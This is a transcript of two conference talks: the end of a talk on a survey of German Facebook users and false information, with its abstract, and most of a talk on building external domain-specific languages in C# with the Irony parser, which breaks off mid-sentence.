reposted it in Facebook groups that were focused on the acquisition of quantitative data for questioners, which is to some extent also small problems. Overall, we collected data from 119 persons. But since these platforms or these groups are actually really focused on students trying to acquire participants for their studies, our sample is very focused on students of the age group of 21 to 27. So instead of showing the questioner in detail, I will try to spare some time by just focusing on the results and talking about the questionnaire built up during the results, so to speak. I will not talk a lot about gender because we didn't find any interesting results in this context and no significant results. And overall, which is a bit discouraging to some extent, but the overall headline of our paper is not so true. We didn't find a lot of results showing some interactions between these variables. But I would argue that some of the descriptive results we find are a bit interesting. So don't question too much that I will talk a lot about descriptive results now in the beginning. We will later on talk a bit about interactions between these variables, but we just didn't find a lot of results. So I will talk with Facebook usage. Again, we tried to find a variable to measure the intensity of active Facebook usage. We didn't invent any parts of our questionnaires by ourselves. We actually took some more or less validated questionnaires from other research areas and adjusted it to our specific use case. For the Facebook usage, we used a questionnaire that is used in psychology to measure daily media usage, but also other addiction types and every now and then adjusted to some extent. And we use it for Facebook and specifically. So we adjusted the questions. You have a scale that is not really metric or ordinal at all, but is some sort of temporary scale to measure how often you use something. We identified certain Facebook activities that we wanted to include in this questionnaire. So something like updating status, general browsing, reading posts, some active and some passive activities, and we summarized all these results in an overall variable called Facebook intensity, which we will later on actually use to measure the Facebook usage in significant tests. So I will go into the source of this part of our questionnaire right away. Don't be discouraged by this large table. I will focus on the important results. It's a bit hard to interpret the results since the scale is a bit different, but overall, we find some effect that is rather well known in social media research and in research of collaborative media overall, which is that Facebook is mostly used in a passive way. So people use Facebook to browse in a passive way, read posts and so on, and very rarely users use Facebook in some sort of active way by really updating something, commenting something and so on. This is rather well known, but this is some sort of statistical problem for us. If you want to find difference between these, you can call it post on lurker groups overall. Overall, the Facebook usage is, so to speak, rather low or mediocre. You have a lot of people that use it very passively and few people that use it very actively. This is not something super novel for us. The more abstract analysis concerning trust in social media is a bit more interesting. Again, we use the questionnaire from another field of research, a scale to measure consumer skepticism toward advertising and transferred it simply to social media or in this case, Facebook, you have certain questions that you give your affirmation to on a scale from one to five. So in this specific case, you get asked if you find social media informative, truthful, reliable, accurate and essential. We sum this value up to get an overall measurement for trust in social media. Looking at these specific results in a descriptive way, we did find a low to mediocre overall trust in social media. The lowest value is fine for the statement social media is reliable. The highest value for the statement social media is informative. Overall, our specific sample seems to be a bit skeptical of social media and have a mediocre trust, a mediocre skepticism towards social media. Looking at the concrete topic of our paper, the interaction with false information. Again, it was the same questionnaire type as the Facebook intensity. We just adjusted the question to false information, but the measurement scale was the same. So the results are quite comparable. We looked at the question how many times people perceive to consume false information, share, comment and like false information. Again, if we look at the statistics for this, we also find something that is also shown a bit in other research, which we can indeed verify here for Germany as well. People assume or at least they say that they consume false information quite frequently. It's a bit hard to transfer these numbers, but the value four is something like multiple times a month. But when it comes to active interaction with false information, they think to not interact at all with false information. So they don't think they share those false information. They don't think they comment or like or do anything with false information. Too much very low values for this topic. When we looked at what people, what tactics people apply to verify information, we used a questionnaire part of Lenegin and Metzger. They designed a questionnaire on psychology to study the credibility of information. And we could basically just take this questionnaire, we removed some questions that just didn't make any sense in the context of Facebook, but other than this, it's quite the same. You can see various types of ways to verify information like checking the page itself, the credentials of the poster, using other information sources. Looking at this results in detail, we identified that the verification strategy seems to vary quite largely among the participants. So the most frequent verification strategies are indeed to use other information sources and to check the comments of the Facebook post. And on a more abstract level, check if the information is an objective statement or an opinion. But the values are on the distributions of selection of these items is quite similar. So every of these tactics is chosen among some participants most frequently the use of other information sources. When we talk about the reaction to false information, what we mean are the different possibilities that you can actively interact if you encounter false information on social media platform or Facebook specifically. Nowadays you can report a contribution on Facebook directly to Facebook as false information. You can of course even more actively try to comment the post and say that this is false information, you can share it. What we did however, identify that these kind of active interactions with false information are something people rarely to never do or at least they report and ever do it. The only thing they do is they unsubscribe to post rather occasionally on average. This is of course kind of discouraging that they wouldn't interact with a function like reporting the post which is rather easy on Facebook and also works anonymously. But they tend to do just a rather passive activity to react to false information, which is of course a problem for the finding of false information on the side of Facebook. Now to the real title of this paper itself, which was the interaction effects between the person related factors and dependent variables. We performed several statistical tests for all the variables and the questionnaire items. Since we analyze a lot of research questions where to perform a correction of the level of significance, which we did, so the P values I will report shortly are corrected and P values again gender did not show any significant difference and overall we didn't find a lot of interaction and relationships. So overall we did for our sample not find the person related attributes are a important predictor of false information behavior measured by our instruments. The things we did find and I will report nevertheless some of them are trivial and intuitive to some extent. For example Facebook intensity so the more active you are on Facebook the more you seem to trust Facebook and social media, which sounds intuitive. The more active you are on social media on Facebook specifically the more you also seem to actively engage with false information so to share comment and like false information on a moderate level and which also sounds rather trivial for us but is also interesting at the same time. Concerning trust in social media as a factor that might influence the way you interact with false information we did not find a lot of significant results again. One significant correlation we did find with the verification of false information specific activity to check the comments of a post to identify if this post is false or true or contains false or true information and that also sounds a bit intuitive if you trust social media more you probably trust the participants of social media on a larger scale and therefore you trust comments more would be my explanation for this. So to summarize these results again we did not find a lot of what actually our goal was person related factors as an influencing factor for false information behavior. Nevertheless we did find some interesting finding some of them were verified concerning previous research specific participants think to consume false information but they don't think they interact in the distribution of false information in any way. The more active a user is the more likely she or he interacts or reacts to false information but a bit of a problem is that people even if they encounter and identify something as false information don't seem to want to report this this problem they passively just unsubscribe to poster and that's the most frequent activity. This is also of course in line with the simple fact that most people use these platforms in a passive way. So the group that would report stuff like this is rather small which is their active poster activity to look on Facebook. Of course the study has a lot of has a lot of rather clear limitations and it's a limited sample size again we were only meant able to acquire a lot of students which is a limitation but in the other hand and this age group from 20 to 27 is also the largest group on Facebook so you can work to some extent with this data and what I really really want to point out is the subjectivity and which is inherent in a questionnaire study we did not measure that people really encounter false information in less than a month we only measured what they perceive to encounter. We have again the over representation of students and the problem which was also a statistical problem that the majority of Facebook users is rather passive. We had some open-ended questions to gather some qualitative feedback for example some questions what other verification strategies people use and but this open-ended questions were barely used because the questionnaire was large enough as it was and I think that people were a bit too exhausted to also answer qualitative questions so there was no point in using them. So although some limitations I think there's a lot of future work you can build upon these limitations I would thank you for your attention and I think I was okay in the time frame and thank you for your attention and I'm looking forward to your question.
In this paper, we present a survey study with 119 participants conducted in German, which investigates respondents’ Facebook behavior. In particular, the survey provides insight into how the individual factors gender, user type and trust in social media influence information behavior with respect to false information on Facebook. Our participants’ Facebook use is predominantly passive, the trust in social media is mediocre and most users claim to encounter false information on a weekly basis. If the truthfulness of information is verified it is mostly done by checking alternative sources and for the most part, users do not react actively to false information on Facebook. Of the different categories of Facebook users studied, more active and intensive users of Facebook (posters and heavy users) encounter false information the most. These users are the only user group to report posts with false information to Facebook or interact with the post. Participants with higher trust in social media tend to check the comments of a post to verify information.
10.5446/14064 (DOI)
Good. Okay. And my mic is on, it seems. Hello, everyone. My name is Jimmy Bogard and this afternoon I'm looking at building external DSLs. I first got introduced into external DSLs when we had a project that, any project that grows on for long enough, eventually it always has to have some kind of rules engine that seems to be just inevitable. Any enterprise software, if it's around long enough, the user is going to want some infinite customizable thing that says, well, we need some rules engine that can do whatever we want. We don't want you to code anymore. We'll have the rules engine to do what we need and you can just build this rules engine for us. And so that's where I first got introduced into external DSLs was needing to have something that the user could type in and us take whatever they typed in and then be able to build executable code from that. So just to give you an example of what we're trying to shoot for here, I've got a simple example of us using a DSL. Can everyone see this okay? So on the first tab here, so I'll do this. We're going to have something very simple. I'm just going to have a calculator. This is not the most exciting thing in the world but just to show that we're having something going on behind the scenes here. So I'm going to have something very simple that just says add two numbers, one plus two. And it gives me result three. Not very exciting, right? So we can make it more complicated like one plus two times three. That's nine. Now what happens we take the parentheses away? What will be the answer now? Seven. So what's going on behind the scenes here is that we're taking that text that someone is inputting in there and behind the scenes we're taking that, parsing it and then building code on the fly to say go ahead and evaluate that result using dynamic code on the fly. So in that example, we're not using some calculator or farming out to the Windows calculator behind the scenes. We're actually taking that text parsing it and then doing something with it. But typically I don't write calculators in my applications. Typically it's something more dynamic like rules. So in this example, we have a user interface where they can type in some user information, first name, last name and then an age. And they want to put in dynamic matching rules to say that they can match based on something they can type in. For example, something like, let's say that the age is greater than five. That we don't want any people in our system to match if they're younger than five. So right now their age is zero so I guess they're not born yet. And I evaluate it and it says not a match, which is good so far. And let's bump up the age now to six and of course now it should say match. Now when you have this user interface, I have a very simple expression here, what's just one value, some sort of operand and another value. That's pretty easy to define a user interface for, right? You could probably have a drop down, maybe it's something I could type in, another drop down for the operand and then maybe they can type in a number, something like that. But what happens if they want to do something more complicated like some logical operators like and or or? So let's say their age is greater than five and their first name is John. So if I evaluate this, it says not a match and of course if I go type in John now, it will say is a match. This is where we start to see DSLs really come into play when we have something like this that's very dynamic that the user can type in but something that a user interface really can't capture. Has anyone ever seen a user interface where they try to do something very dynamic like this where you have to like click and drag and drop and things like that? Or like you have to say your and is actually a grouping where it's trying to visually group things together but then you have or's in there. So you're like, well, is a grouping automatically an and or is it an or? How do these things go together? Eventually the user just says I just really need something like Excel where I can type in things in there and have that be how I evaluate my rules. And don't try to come up with some crazy interface to try to put something on top of this. They just say give me something I can type in and that's all I'm really shooting for. So when you have something dynamic like this, this is where you start to see DSLs really come into play. Something that I can type in whatever I want in here and behind the scenes it's evaluating it against whatever business objects I have defined for this user interface. So before we see what actually went into building this, I wanted to take a few steps back and actually walk through what a DSL is, how it's built and the building blocks we use to be able to get to that endpoint where someone can just type in whatever they want and it evaluates this dynamic expression. Never good switching back and forth. Someone told me that you just use a keynote but even though this says Apple, it's running Windows. So what are you going to do? So looking at what a DSL is, it's composed of three parts. It's a computer programming language, one, so people can do some sort of programming with it. Two, it has a limited expressiveness. So I'm not trying to get the full entire programming language with functions and methods and variables and things like that. It's something that it's very limited and then the last part is it's focused on a particular domain. So I'm building this limited expressive programming language for a very particular use. There are two types of DSLs out there, categorized into the first kind which is an internal DSL and if anyone doesn't recognize this is a fluent and hibernate example of an internal DSL. So in an internal DSL, they're called internal because they're written in a general purpose language. So in this example, it's written in C sharp. It will use a subset of the languages features. I'm not, in this example, I'm not using a lot of different things that are built into C sharp. I'm only using a very targeted limited scope based on what things I exposed through my internal DSL. So I'm not trying to allow someone to write an overall language. I'm just saying you get this very targeted piece you're building here. These are also called fluent interfaces where you have, you know, method chaining and things like that that allow you to read configuration a lot easier than having to go through XML and things like that. So these are also built to just handle one aspect of the overall system. So in this case, I don't program my entire application in fluent and hibernate. I only program the piece that is configured in the ORM mapping layer and that's it. And typically these are written in things like Ruby, C sharp, Boo, things like that. Just I'm writing these things in regular programming languages and I'm just trying to use a very small piece of this. Now this is the kind of thing that coders can write, the developers can author, but it's not something that I can expect someone from the business to be able to do. They're not going to go and pop open Visual Studio. They're not going to know, oh, I need a curly brace. Oh, you need to put this little semi colon there. Okay. Oh, you have to have this little colon and make it an inheritance. They're not going to do anything like that. So even if you go for, in our case of a rules engine, there were C sharp based rules engines out there, but all the ones we found were still forced to go into this kind of interface where I had to code something in C sharp. Well, it's not something our users are going to do. They're not coders. They have experience with things like access and Excel. So they have some limited ability, some ability to do things like expressions, but they're not going to be able to know that, oh, it didn't compile because they didn't have the right Lambda operator there. So internal DSLs are targeted for developers. The other thing we find with these is that they're very static in nature because this is C sharp code that gets compiled with the rest of my code. It's not like I can take this and say, after I deploy this to production, let's go change the mapping of something, or let's go add a new rule. I can't do that because the code is compiled. Now, you could do some dynamic compilation things, but that's kind of crazy and a little silly. There's no real point in doing something like that. So while these work great, especially things like this where I'm configuring things, they work really well when the audience is a coder, but they're horrible if the audience is a non-coder. For things like that, we have the concept of external DSLs. And external DSLs, in this example, it's gosh, Nant. I hope no one still uses Ant or Nant these days. I've moved on to greener passures. In this case, the language is actually separate from the main language of our application. So even though our application is written in.NET, even the runner behind Nant in this case is.NET. This is not.NET, right? This is XML. So it's always written in a language separate from the application that it works with. There's typically a custom syntax, although it can borrow from something existing, so they have to make up something completely new. In this case, this syntax is XML because hey, I don't have to write a parser for it. There's freely available XML parsers out there. And it has a very well-defined syntax. I don't have to invent a new markup language. XML is just already there for me. And typically, we see external DSLs parsed in the host language using a number of parsing techniques. And we'll be digging into it in a little bit what techniques people use to take just raw text and then be able to reason with it and do something with it. So external DSLs, these are really good for non-coders, although non-coders are probably not writing Nant code. But if we had something like a text rules engine that we saw in our example earlier, there's nothing in that interface that says you must be a coder to be able to write ages greater than five. And that's just something that's, in fact, we do want to have a greater than sign. We haven't want to have the words greater than. That's something we can choose as well. But the idea is that the audience is someone that's a non-coder or have something like it needs to be more dynamic in nature, that it does not get compiled along with the rest of my application. So in this case, Nant is already compiled, but it uses this text input to be able to drive being able to execute builds or compiling or running tests and things like that. So I don't have to compile this in order for it to change. So if I want to just make it do something else, I have to do is edit this text file and run it again, but my Nant code is already compiled. We're in the previous example of fluid and hibernate. If I change anything in that file, I have to recompile the entire application. And if I go and deploy an application, it's important to know can they change that after it's already been deployed? We're looking at the processing pipeline of how to take this and, in our example, have actual executing code. There's two main steps that come into this. So we start out with some sort of DSL script on one end and the other side, we have some sort of executable code. And in between there, we're going to use a couple techniques to be able to take that raw text and then do something with it. So we start out with just this raw text and then we have to take it and then parse it in some meaningful manner. So if we have XML, it's pretty easy to parse. We just use whatever library that comes with our framework that we're using to say, I can parse that XML and then do something with it. And XML typically has, after it's been parsed, something that you can use and walk the trees and things like that. So typically, XML APIs have some sort of knowledge of XML elements and attributes. So you can go examine those things to see what the user's input. So if I want to know that in that Nant example, what the target names are and things like that, it's pretty easy to do. Now, if I don't want to do XML and I want to do what we saw, which is just custom text, in that case, we have to pick something for this middle step. So in that first parse step, there are a lot of things people can do to do that parsing. We see typically people do things for very simple external DSLs. They can just hand roll a parser, like regular expressions or just, you know, string manipulation, just looking at the string. But for the one we saw, that was arbitrary complexity. We started out with something simple, which is just a simple Boolean this greater than that. But then we kept adding on that says, well, and this other thing. And I can add more parentheses and logical operators and it can get as complex as I want. And something like regular expressions are not going to work well for something like that. Instead, once we start to see this additional level complexity or sort of the user can do whatever they want kind of situation, that's the case where we stop using our hand roll, just regular expression, string manipulation parsing, and we start to use a real Lexar parser. In this case, we'll use something that is built for this specific task. So there are tools out there, typically in the compiler area that people use to parse text and then do something with it. And the typical tools we see out there are Yak, which I don't know what it stands for. Antler is a really common one in the Java community. And then the one we're going to be looking at today in the.NET side is one called irony. There's also language workbench, so you can visually design what your language is supposed to look like. Microsoft had a project a few years ago that underwent numerous revisions and eventually got canceled, but they were trying to do something like this. Or we can use just one of these off-the-shelf tools. I don't think some of these are not free, but some of them are. Now, these tools, what they are typically used for, are for building compilers. So these are meant to define some sort of what the programming language is supposed to look like, and then you take that and then you can go do something with it to compile it. Well, I'm not building a whole programming language, but these tools are really good to be able to just parse text. So people also use these tools as just general-purpose parsers. And I don't know the difference between lexer parsers, so if someone else is out there and wants to make me look dumb, go ahead and yell it out otherwise. It's just all one thing. So if you look at our original text, we had something very simple, like 1 plus 2. And I don't want to take this text and reason about it, because what I want to do behind the scenes eventually is to say that someone is trying to add two numbers, and this is the first number, this is the second number, and this is the thing they're trying to do. They're trying to add. So I need to be able to look at this and know that, well, these two are numbers, the left and the right, and the middle thing is an operator, so it's a plus. I need to take those two things and then do something with it. So parsing will be able to take that text and get information out of it in an easy way. The next step we need to do is once we're able to parse that, we actually have to put it in a model that makes sense for application. So if I look at this and say, okay, I need to build some sort of model that defines what it is, then if I look at this 1 plus 2, I see in the left there's a number, and in the right there's a number. So instead of saying, well, you know, I need a 1, a 2, and a 3, and a 4, I could just say, well, it's just a number. And the thing in the middle, that's just some sort of binary operator. In this case, it's just add. So if I take what I see here, I can build a model around it that says, this is representing me trying to add two numbers together. So I can build a tree that says I'll have an add node at the top and then two nodes on the side that represent the different numbers I'm trying to add. This structure is commonly known as an abstract syntax tree, and it is typically the output of our lexor parser step. That the lexing and parsing builds up this tree of nodes that represents what the user inputted. Once I have this tree, I can then do whatever I want with it. These are just regular objects in whatever library I'm using, and now I can take these and do something with them. So I want to take these and maybe print them back out on the screen. I can walk the tree and do that. And when I take them and build a sequel from it, I could do that. If I want to take these and build dynamically executed code, I can do that as well. But I have to have some model that defines what this needs to look like. Typically the lexor parser tool is out there. What they'll do is they'll have a generic node that represents one piece in the tree, and then they'll let you define custom ones to be able to have, be able to reason about it more cleanly. For example, in this case, with an add node, I always know that there's two things I'm trying to add. So I can just genericize it and say, well, there's the left and the right. So on my add node, I can define members on there that are for the left and the right as opposed to having to go into the child nodes and go just dig around. The other thing we have here that typically are lexor parsers forces define is the places in our tree that can branch off into additional nodes and the places in our tree that are basically the end. So in this case, the add node is what's known as a non-terminal and the blue one is known as a terminal because it ends. So non-terminal terminal, it'll make more sense when we actually see how to configure these things. So now that we have our object model parsed out, we can then go take that object model and do something with it. And typically this is our step here where you say I want to now generate something, in this case, our target code. So for us, I want to be able to execute C sharp code on the fly based on what someone has typed in. So in the case of the calculator, 1 plus 2, I want to actually execute C sharp code that is 1 plus 2. With later versions of C sharp and.NET that was made a lot easier because they introduced the concept of expression trees. So what we'll do in the generate step is we'll walk the tree recursively, just one node at a time, and each step along the way will translate the abstract syntax tree that was built up by the parser and translate it into a C sharp expression tree which then can be compiled on the fly and executed at runtime. And that's really the magic behind this whole thing is the ability in C sharp at least to be able to dynamically compile and run code that's built off an expression tree. Now something they don't have very well right now is the ability to just type in C sharp and say execute that. They have some abilities to do so but there's nothing really like a repel or something like that to say just type in things directly. So instead we have this other expression tree thing that lets us build something that's maybe like it could be a C sharp compiler kind of expression tree but it's a limited functionality but it helps us get the job done of just saying I can add two numbers. We can also do something else in our generate step. In the actual example that we went from that this whole talk is coming from, we had to have multiple targets for our DSL. We had to have executable C sharp codes that actually ran against regular dot net objects. We had to have the ability to take that same user input and actually be able to generate the correct SQL behind the scenes so that it can be in a where clause. So I could either execute my matches on the client side with our thick client application or I can execute on the server side in SQL itself. By having one model that can go both directions, it made it a lot easier to do so. I have to reinvent parsing every single time. We also had things like, well make sure that if it's an expression to evaluate true false, well make sure it actually evaluates true false. It's not, you know, I'm not, they didn't type one plus two because that's not, it's not JavaScript, it's not truth or false or whatever, it's number. So we needed to be able to say, oh, we actually need a Boolean here and you typed in a number so that's not going to work. All that can be done as long as we have this nice semantic model to work from, that abstract syntax tree. The tool that we're going to use to build our external DSL is a tool called irony. Irony is a tool that allows you to build lexor parsers in C-sharp. So you build a class that represents whatever your language is and then irony will execute that against any arbitrary text to give you some sort of syntax tree behind the scenes. You can use this tool just like all the other parser lexors out there to build your own programming language. But I'm not trying to do that. My users aren't wanting to build their own programming language. They just want to be able to type in something to evaluate true false and that's it. Well the good thing is that tools like the, tools like irony are good about that. They can be a very simple, they can build very simple languages or they can build very complex languages and it's really however much you want to put in there that tells you what you want to do there. When we looked at this, we did evaluate to say, well why don't we just use, we don't want to go through this whole parsing lexing step. I don't want to build trees. I don't want to build anything like that. I don't want to build custom compilers. Can't I just use something like Ruby or Boo to do this? Because those tools do have very rich language-centric features that let you manipulate things and do things dynamically and things like that. Well what we saw is that if I start from something like Ruby or Boo, I can't really subtract features out of the language. I can't say, well you can't import modules. You can't, you can't write functions. You can't write classes. You can't monkey patch things. You can't do anything that stuff. But you can write this really simple stuff here. So that doesn't really work that way. You can't, you can't pare down languages. You can only really build them up. So that's why we went with a custom lexer parser because we wanted to be able to build up what was, what was actually available for them to use and not try to remove things and have to check to see, oh you actually didn't have that there. The other thing that we saw was that with a tool like this, let's just completely live in the environment of, of our frame rate that we're running on which is.NET. So I don't have to worry about if it was just Ruby or Boo or something like that. I wouldn't have to worry about working through its compiler to figure out what do they actually type in there because we wanted to be able to translate to multiple languages. I wanted to target SQL on my target.NET from one single bit of text. And that's harder to do if you have to work through someone else's parser, someone else's compiler. So instead we just used a lexer parser off the shelf, in this case irony, and just went from there. So let's look at our demo to see how we built our Excel like magic where I can add numbers and execute custom roles. Are there any questions so far? Can everyone see this okay? So one of the things we worked with was we needed to be able to identify what the users are actually going to type in. In our case, we didn't really want to invent a new kind of language that people can type in. For example, we knew we already were going to be targeting SQL, so we didn't want to invent new kinds of operators. So instead of, for example, typing in a less than sign, I didn't want to have the user type in less space than. It just wasn't going to be any value to them. So what we did was we looked at an existing language out there, in our case, SQL, and said how can I take that and just remove the stuff I don't want and build my actual expression. So what we're looking at here is this is the definition of SQL in a format known as extended back into our form. And we're not going to talk about that in this thing, but it's basically a way to describe how a language is built up. So this text, I can actually pump into tools that support that. For example, Antler and Java supports a version of this, and it will be able to build a programming language, the nodes on top of this. And it will be able to build the parsers and things like that. So what we find is that our rules are defined, like here I have query is an alterer, I create a delete, all my crud stuff, a select or an update. And then further down defines what an alter statement is. But again, I'm not creating SQL, I only really want the expressions. Let me go look down to see the actual expressions here. Okay, so here we go. So this is the definition in e, b, and f of expressions in SQL. So it starts out with a generic definition that I have this thing called an expression. But an expression is defined as some other things. It's defined as either an expression or another expression or just an expression by itself. And it keeps going down. So you see, and is defined, not as defined, my predicate expressions are defined, all the logical operators of in like greater than less than, all these kinds of things, all the way down, defining what values can be, values in ID, and integer literal, or real literal, string literal, or null. And what you'll find here is that I can be able to substitute in a named entity, like value, and then have its definition of what that is later on. And so what this allows us to do is have a very generic definition of how things are put together, and then later on define the specifics of those individual pieces. And for an expression, we need to have arbitrary complexity, things like, you can have as many parentheses as you want, as many a's as you want, as many or's as you want. We need to be able to find this recursive nature to be able to say, well, eventually I get to the point where an expression list is an expression comma separated with other expressions or an expression. So it starts to become self-referential so you can have any arbitrary complexity here. So what we can do is we can start with this picture of what the syntax should look like, and then go to our irony version to see how that translates into that. Now, for some external DSLs, if you don't have to have arbitrary complexity expressions, this kind of stuff is really unimportant. But for times when we have to care about, well, I can support any number of additions, subtractions, multiplications, any number of parentheses we want. It helped us to be able to have some sort of starting point so we don't have to think it up as we go. We just have some target for us to say, here's a good starting point, and then we'll go from there on what we want to support. So in irony, in order for us to define how our language is built, what we're going to do is create a custom grammar class. So here what we're doing is I'm creating another new class called custom DSL grammar and it inherits from this special irony class called grammar. And inside here in the constructor, I'm going to define what my language looks like. So my language, we talked earlier, has terminals and non-terminals, terminals are things that are basically the leaves on my tree, and the non-terminals are the non-leaves, so the things that you're going to have child branches coming off of them. Terminals would be things like, well, here's my number, that's a thing, here's a string literal, that's a thing as well. I'm going to have, just for convenience sake, I'll have a left parenthesis and a right parenthesis, the not operator, the comma, all these things I actually have to tell my lecture parser about these things in order for it to do anything with it. Because these lecture parsers, they start out with a complete blank slate. They say, I have no idea, I'm not going to reason anything about what you're putting into the text here, you got to tell me absolutely everything. So we have to actually teach it about commas, logical operators, all these kinds of things. So here's an interesting one, we say a unary operator is the plus or a minus or the not. So what they're doing here is, irony is actually overriding these, the operator overload, that's another feature C sharp we can use here. So to say that, that a unary operator is a plus, the minus or a not. And then the binary operator is again, plus minus multiplication division modulus, the bitwise operators, the logical operators and the and or I guess those are still logical operators. And so here I'm just teaching it what these things are now. Now that I define what these operators are, any time in the rest of my language definition, I want to refer to, and this can be a binary operator. Well, I just need to reference back to this binary operator object and not have to keep saying, oh, and by the way, binary operators are all these things. I just define it once and I can use it on later. The other thing I notice is that I'm in C sharp now too. So this is where the irony is an internal DSL because I'm in C sharp to build external DSLs. So I will be feeding raw text into this to be able to parse it and do something on the other side. So now that we have a terminals, these are the things that are going to end. The non-terminals are things like dates, expressions, function calls, logical functions. Here's some more functions down here. And now these are just defining these non-terminals to be able to refer to them later on. The other thing you'll notice here is that for some of these guys, I do give them custom node types to say, when you find this one, when you parse something that looks like this, go ahead and use this specific node object to be able to instantiate in my abstract syntax tree as opposed to just being some other generic node. So what that gives me is something like my tuple node, which is just a generic comma and a separate list of things. I can have just inside there something easy to refer to like expression. Or if I have something like binary expression node, I have the left, the right, and the operand. If I just had the base node that comes with irony, I would have just a collection of child nodes I'd have to reason about every single time I walk the tree. With my custom nodes, I can say I can refer to these as very specific targeted things and have to worry about, oh, it's the second child node on the first one. That's the right one to do. So I've just defined a bunch of variables to say, here's all the names of my non-terminals. And then now that I've built up my terminals and in my non-terminals, I start to build up the rules behind these things that I've built. So looking at expression. An expression, its rule is a terminal, a unary expression, or a binary expression, one of those three things. Now notice that this actually starts to look very similar to our SQL text that we saw earlier. Expression was an expression, expression, or this one. So even it has a little, little pipe symbol to say, little or. So this is just a helpful thing that we found with irony was that it uses operator overlighting and C sharp to be able to have something that looks more similar to what we might find in people that are actually writing these extended background to our form documents. And so what we've done is we just start assigning the rules for all of our different pieces in our puzzle here. So an expression rule is this, and that if I have an expression list, then it's a self-friendfragile one where it says I can have an expression list comma separated with another expression. So that allowed me to have just arbitrarily number of expressions comma separated. I define my literals which for, in our case, dates and booleans, we had to tell it. This is when you recognize this text, this is how you reason it as a date. So for us, we've said that date is the text date plus a left parenthesis plus some sort of string literal and then a right parenthesis. Now we could have done anything for this. We could have said it's enclosed by the pound sign, it's enclosed by the dollar sign, it's enclosed by quotes. We just want to have something very unique that said this is how you build a date. So I could do whatever I want here. In our case, I just said just the word date and then parenthesis and then some string inside there that will parse out to get a real date. Boolean, we just said it's true or false, the text true or the text false and null is of course the text null. And we keep going down here. We say a terminal is any of these one terminals we defined before, that's its rule. The tuple is a left parenthesis, any expression and a right parenthesis and we just go on from there. My binary rule is an expression, some binary operator and the other expression. So it becomes very simple to define what we're building here because anyone that comes after this and reads this could pretty easily understand what these rules are that we're defining for our expressions here. So I keep going, building out functions, saying that a function call is a logic function, a math function or string function, a logic function is one of these two, the IIF which actually means inline if it turns out and then there's inline case. So if you want to have an if statement right inside there, you could do that. A math, in this case, I just have three power min and max. String I got four, just picked four at random. And we just keep going down. Now once I have defined my function, I can define what they actually look like. So my inline if function is the text IIF and then again left parenthesis expression, comma, expression, comma, expression, right parenthesis. Now what's nice about this is that inside here, this expression, I have to find the rule elsewhere so whatever matches that rule for an expression can work here. So if it's another function call, if it's adding two numbers, it doesn't matter. As long as it matches the rule of an expression, it'll match this. So that's a really nice thing about parser and lexer is that because they can reference themselves and their definition, they can have these recursive arbitrary complexity pieces going on. So I go on and define all my functions. One of the things I do that is special is that I want to be able to say, oh, and I want to be able to reference a property in an object. So do you remember the example we said, age is greater than five or whatever? Well, for us, what does that look like? It's the dollar sign and then a field name. And then our field name with C sharp, it's actually built in to the irony tool that I can tell it's, it's got pre-built definition of what an identifier looks like. So it already knows what a C sharp identifier looks like, what the rules are behind there. So I just say the field name is that. And then all I need to hear is a dollar sign and a field name and I'm good. I have another one too, which is the today rule. If they want to have it execute daytime.now or just whatever the current date is, then they have to just type in pound curly brace today and it will match and do something. The last piece I have to do is define some grammar metadata for our parsing rules. So one of the things that's irony does that things like antler do not do very well are things like operator overloading. In the states anyway, the expression was please excuse my dear Aunt Sally to remember what order operators are supposed to be executed in. I don't know what they do in other places, but that's what we had to learn. But of course, we have to extend that for not just parentheses and our mathematical ones, but all the Boolean ones as well. This is actually really hard to do in antler. There's not a built-in way to say here's the order of my operators just figure it out. But in irony, we do have a really easy way of defining here's the order of my operators to execute them in. The last thing we have is our punctuation that this is the last important part anyway. If I don't do anything, all of the punctuation will come through as nodes in my tree. I don't care about comments showing up in the tree when I parse it. I just want a binary node that says it represents add and here are the two numbers. If I didn't tell it about the punctuation, it would include those in my actual tree that I would walk through. I don't really want that. So by doing this step, I'm able to say remove those from whatever you actually parse out into the tool. Now with other lexer parser tools like antler and yak, this is a second step. So lexing parsing, I think this is a parsing step where you go remove these kinds of nodes. Because things like debuggers do care about white space, do care about these commas and such. So those tools do have a two-step process for just parse everything including white space. Okay, and then have a second step that is remove all the white space and have it have something that is more reasonable to work with. Give it a comma, parentheses, all that kind of stuff. With our tool, I don't really care about having a two-step process. I just care about my end result. So that's what I'm doing here. The very last thing I have to do is set the root to whatever expression it needs to be. So in this case, the root of what it's going to start parsing is my expression definition. So let's see how this might work. How will we actually use irony to custom execute something? So I have a unit test, of course. Everyone's supposed to test, right? The first step in using our DSL grammar that we created is just to instantiate the custom DSL grammar object that we built. So the custom DSL grammar class, I just instantiated a new version of this, a new instance of it. And now this guy is just the definition of the grammar. At this point, I need to get it to irony to be able to actually parse it. And for them, it's a two-step process. I first have to create this language data object. I don't know why, but I have to do it. But there it is. And then the next step, I create an instance of a parser based on the language data it got out of my DSL grammar. Now, internally, what this actually does is all of the optimizations behind how to evaluate those rules, the grammar is just a definition, but it didn't really help parse things. So you can imagine that the code it has to execute to parse things is pretty complicated. So that's what those other two steps are, is doing all the behind-the-scenes optimizations. External tools like Antler and YAC and things like that, they actually do code gen. So when we looked at those, they were actually generating C-sharp code or Java code that is the actual parsing. And it was just horribly ugly to look at. So, and we don't want this other, this step of, well, I have to code gen something and then compile something. We don't want to have any steps like that. So with irony, it's already in the language I'm working with. So bonus. And the last thing we have is our C-sharp expression builder. I'll dig into this in a second, but this is the magic that takes the tree and builds up executable C-sharp code. So it looks like it's a simple example of, I just pass in a string and I want to do something. So on line one, I say parse it up, parse, I am a string. Now notice it's in single quotes. That's because in our grammar, we told it that string literals are enclosed with single quotes. They're not just by themselves. That gives me this tree object. From that tree, I can do things like look at its, if it has any errors, does it have any child nodes, things like that. That's what this tree object gives me. It gives me things like, does it have errors? Are there any messages? All those kinds of things come back from this tree object. As part of that as well is an individual AST node that I then go work what to do things with. I'm going to debug this guy just to show what the tree looks like in the debugger. So if I go look at this tree, the root is a node. It does not have any child nodes. Not going to work. Never works with my zoom it. It doesn't have any child nodes. First child, last child, I don't know why those blow up, but they just do. And then finally down here, it gets down to the actual value in here is my AST node. It's a literal node and the value is I am a string. So this actually did one of our custom nodes to be able to say it's this value here. The reason why we had that is if we had to use the regular node that comes with irony, it's really hard to work with. So we want something that's a little bit easier to work with when we're actually executing code. All right, at this point, I have just a tree of objects. And what I want to do is go one step past it. And now I have a function. So this guy is actually, I'll get rid of the var there. It is just a delegate, func object. So I don't pass any arguments and it gets me an object back. And that's all it is. So I gave it a tree and it gives me back an actual function that I can execute. And that's what we do in the very last line. I 